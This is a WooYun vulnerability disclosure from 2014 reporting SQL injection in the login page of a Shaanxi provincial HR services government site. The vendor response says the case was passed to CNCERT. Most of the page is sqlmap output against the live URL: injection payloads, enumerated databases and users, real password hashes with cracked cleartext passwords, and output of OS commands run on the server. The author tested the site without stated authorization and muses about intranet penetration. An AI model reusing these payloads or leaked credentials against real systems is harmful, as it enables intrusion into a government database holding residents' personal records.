当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053001

漏洞标题:陕西省人力资源服务机构管理系统登录页POST注入

相关厂商:陕西人才公共服务网

漏洞作者: Neeke

提交时间:2014-03-07 13:38

修复时间:2014-04-21 13:38

公开时间:2014-04-21 13:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-07: 细节已通知厂商并且等待厂商处理中
2014-03-12: 厂商已经确认,细节仅向厂商公开
2014-03-22: 细节向核心白帽子及相关领域专家公开
2014-04-01: 细节向普通白帽子公开
2014-04-11: 细节向实习白帽子公开
2014-04-21: 细节向公众公开

简要描述:

同事准备转户口,扔出这个陕西人才公共服务网,上面可以查个人户籍所在地等信息,顺手试了一把。

详细说明:

http://hrm.snhr.gov.cn/login.asp
POST参数:cname=a&pwd=a&kind=a

漏洞证明:

Screenshot from 2014-03-07 09:15:50.png


Screenshot from 2014-03-07 09:16:01.png


sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
database management system users [3]:
[*] sa
[*] yxgc
[*] zjgl
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] $zjgl
[*] ccts
[*] master
[*] model
[*] msdb
[*] StuRegister
[*] tempdb
[*] yxgc
[*] zjgl2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb6370f972f9c9125fb8919e8078b3f3c3df37efdf3
header: 0x0100
salt: 4086ceb6
mixedcase: 370f972f9c9125fb8919e8078b3f3c3df37efdf3
clear-text password: sa
[*] yxgc [1]:
password hash: 0x0100593f946dd9c470405cdbde8e26705fc9900804fc82b0525e
header: 0x0100
salt: 593f946d
mixedcase: d9c470405cdbde8e26705fc9900804fc82b0525e
[*] zjgl [1]:
password hash: 0x01001f7fcbcf4596272617f586d67bb30e47a2c33eaa05c15e21
header: 0x0100
salt: 1f7fcbcf
mixedcase: 4596272617f586d67bb30e47a2c33eaa05c15e21
clear-text password: 123456
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
command standard output:
---
Windows IP Configuration
Host Name . . . . . . . . . . . . : ibm
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82575EB Gigabit Network Connection #2
Physical Address. . . . . . . . . : 5C-F3-FC-A7-CC-62
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.33.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.33.1
DNS Servers . . . . . . . . . . . : 218.30.19.40
61.134.1.4
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
command standard output:
---
服务器名称 注释

-------------------------------------------------------------------------------
\\2011-20131030JB
\\5KUK7HRFDXWVQAE
\\IBM
\\LENOVO-125BF0D0
\\PC-20130129EYBO
\\RC-7FE068CAE8FC
\\RCSC-TP53Z8UEUW
\\SNHR-DANGWEI
\\SUH-104FE84B032
\\XP-201206261032
---
进一步提权然后内网渗透应该可以吧?点到为止,没继续了。

修复方案:

相信自己!

版权声明:转载请注明来源 Neeke@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-12 14:43

厂商回复:

已经转由CNCERT下发给陕西分中心处置。

最新状态:

暂无